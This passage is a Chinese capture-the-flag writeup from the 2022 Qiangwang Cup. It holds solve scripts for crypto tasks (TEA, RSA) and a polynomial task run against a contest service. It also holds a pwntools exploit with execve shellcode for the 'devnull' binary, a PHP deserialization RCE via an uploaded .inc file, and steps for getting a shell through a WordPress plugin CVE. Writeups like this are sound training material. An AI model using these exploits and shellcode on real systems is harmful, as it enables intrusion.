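    uint32_t delta=0x9e3779b9;                     /* key schedule constant, same as decrypt() */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i < 32; i++) {                       /* 32 rounds, matching decrypt() */
        sum += delta;
        v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
    }                                              /* end cycle */
    v[0]=v0; v[1]=v1;
}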

/*
 * TEA decryption of one 64-bit block (v[0], v[1]) under the 128-bit key k[0..3]:
 * 32 rounds run backwards, with sum starting at 32 * delta = 0xC6EF3720.
 *
 * v: in/out block   k: key words (read only)
 */
void decrypt (uint32_t* v, uint32_t* k) {
    const uint32_t delta = 0x9e3779b9;
    uint32_t left = v[0];
    uint32_t right = v[1];
    uint32_t sum = 0xC6EF3720;   /* 32 * delta */
    uint32_t round;

    for (round = 32; round > 0; round--) {
        right -= ((left << 4) + k[2]) ^ (left + sum) ^ ((left >> 5) + k[3]);
        left  -= ((right << 4) + k[0]) ^ (right + sum) ^ ((right >> 5) + k[1]);
        sum -= delta;
    }

    v[0] = left;
    v[1] = right;
}

/* Ciphertext words pulled from the check() memcmp (per the writeup). The trailing 0
   is not data: it terminates the decrypted bytes so main() can print them with "%s". */
uint32_t enc[] = {1570024068, 351937696, 727056912, 3063668041, 2867849940,1267528902, 159365321, 3052163538,0};

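/*
 * Decrypt the eight ciphertext words of enc[] in place, one 64-bit TEA block
 * (two words) per decrypt() call, and print the result as a string; enc[] carries
 * a trailing 0 word that serves as the "%s" terminator.
 *
 * Returns 0.
 */
int main()
{
    /* Key words are the little-endian bytes of "0123456789abcdef"
       (0x33323130 = "0123", 0x37363534 = "4567", 0x62613938 = "89ab", 0x66656463 = "cdef"). */
    uint32_t key[4] = {858927408, 926299444, 1650538808, 1717920867};

    for (int i = 0; i < 8; i += 2)
    {
        decrypt(enc + i, key);
    }
    /* enc is uint32_t storage; view it as chars for printing ("%s" expects char*). */
    printf("%s", (const char *)enc);
    return 0;
}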

得到的flag直接交不对,看了字符的形式应该是位移了一下放到在线网站解密

2022强网杯 Writeup by X1cT34m-小绿草信息安全实验室

强网先锋

asr

离谱的题目,n开平方放yafu里硬跑,跑出来的结果还要在日志里面翻,跑了两次,跑出来两个素数,然后剩下的部分再用sage分解或者yafu都可以。
e和phi不互素,把不互素的两个质数去掉算就可以了。

from Crypto.Util.number import *

# Public key and ciphertext; n is the square of four primes (checked below).
n = 8250871280281573979365095715711359115372504458973444367083195431861307534563246537364248104106494598081988216584432003199198805753721448450911308558041115465900179230798939615583517756265557814710419157462721793864532239042758808298575522666358352726060578194045804198551989679722201244547561044646931280001
e = 3
c = 945272793717722090962030960824180726576357481511799904903841312265308706852971155205003971821843069272938250385935597609059700446530436381124650731751982419593070224310399320617914955227288662661442416421725698368791013785074809691867988444306279231013360024747585261790352627234450209996422862329513284149
p1 = 260594583349478633632570848336184053653
p2 = 223213222467584072959434495118689164399
p3 = 218566259296037866647273372633238739089
p4 = 225933944608558304529179430753170813347
# Full Euler phi of n = (p1 p2 p3 p4)^2, kept for reference: per the writeup it is
# not coprime to e, so it is not used for the inverse.
phi = (p1 * p2 * p3 * p4) * (p1 - 1) * (p2 - 1) * (p3 - 1) * (p4 - 1)
assert (p1 * p2 * p3 * p4) ** 2 == n
# Work in the sub-modulus (p1 p2)^2 instead, whose phi is coprime to e, and reduce c into it.
nn = (p1 * p2) ** 2
c = c % nn
dd = inverse(e, p1 * (p1 - 1) * p2 * (p2 - 1))
m = pow(c, dd, nn)
print(long_to_bytes(m))

polydiv

from pwn import*
from sage.all import*
io=remote('123.56.86.227', 29644)   # challenge service used by proof_of_work() and the main loop below
#验证码
def proof_of_work():
    """Solve the service's sha256 proof-of-work.

    Reads the 16-char suffix and the 64-hex-char target from the prompt, brute-forces
    up to 4 alphanumeric chars XXXX with sha256(XXXX + suffix) == target, and sends
    the answer back.
    """
    io.recvuntil(b"sha256(XXXX+")
    suffix = io.recv(16).decode()
    print(suffix)
    io.recvuntil(b" == ")
    target = io.recv(64).decode()

    def matches(candidate):
        digest = hashlib.sha256((candidate + suffix).encode()).hexdigest()
        return digest == target

    prefix = util.iters.mbruteforce(matches, string.digits + string.ascii_letters, 4, 'upto')
    io.recvuntil(b'XXXX:')
    io.sendline(prefix.encode())

proof_of_work()
R = PolynomialRing(GF(2),'x')   # polynomials over GF(2); the service writes powers with '^'
x = R.gen()


def _read_line(label):
    """Consume `label` from the service and return the rest of that line as text."""
    io.recvuntil(label)
    return io.recvline(keepends=False).decode()


# 40 rounds: the service hands out r, a and c; presumably it expects b with
# r = a*b + c, which is what (r - c) / a computes in R.
for _round in range(40):
    r_text = _read_line(b'r(x) = ')
    a_text = _read_line(b'a(x) = ')
    c_text = _read_line(b'c(x) = ')
    r, a, c = (R(text.replace('^', '**')) for text in (r_text, a_text, c_text))
    b = str((r - c) / a).encode()
    print(b)
    io.sendline(b)
io.interactive()

devnull

from pwn import*
#r=remote("123.56.86.227",18680)
r=process('./devnull')   # local run; the remote() line above is the contest target, kept commented
context(os="linux",arch="amd64",log_level='debug')   # amd64 so asm() below emits x86-64; debug hex-dumps all traffic

r.recvuntil("please input your filename\n")
r.send("a"*0x20)

stack=0x3feA00

# First stage, assembled by pwntools from the mnemonics below.
shell=asm("""
        xor rdi,rdi
        push 0x3fe000
        pop rsi
        pushfq
        pop rdx
        xor rax,rax
        syscall
        jmp rsi
    """)

r.recvuntil("Please write the data you want to discard\n")
gdb.attach(r)   # debugger attach left enabled: needs a terminal and pauses the run - disable for unattended use
r.send("a"*0x14+p64(stack)+p64(stack)+p64(0x40138D))
# NOTE(review): recvline() takes a keepends flag, not a delimiter - the prompt string here is
# merely treated as truthy and a single line is read; recvuntil(...) is probably what was intended.
r.recvline("please input your new data\n")
# NOTE(review): p64() output is bytes on Python 3, but ljust() is given a str pad - the
# script is written for Python 2 (or needs b"\x00" here).
payload=p64(stack+0x28)+p64(0x401350)+p64(stack&0xFFF000)+p64(0x4012d0)+p64(0)+p64(0)+p64(0x4012d0)+p64(0)+p64(stack+0x48)+shell
r.send(payload.ljust(0x60,"\x00"))

# Second stage, given as raw bytes.
shell="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

r.send(shell)

r.interactive()

rcefile

结合spl_autoload_register()通过反序列化去rce。上传inc文件

<?php
// Body of the uploaded .inc file from the writeup: runs `ls` and echoes its output.
system('ls');
?>

通过 0:32:"文件名":0:{} 直接触发inc中代码完成rce。

WP-UM

先随便注册一个账号
利用 upload 上传获取 pf_nonce
利用公开的 cve 遍历文件 password 可以登录
登录之后利用主题编辑器修改 php 文件 getshell
利用 find 命令筛选时间 找到 flag 位置

Misc

签到

直接交

问卷

直接交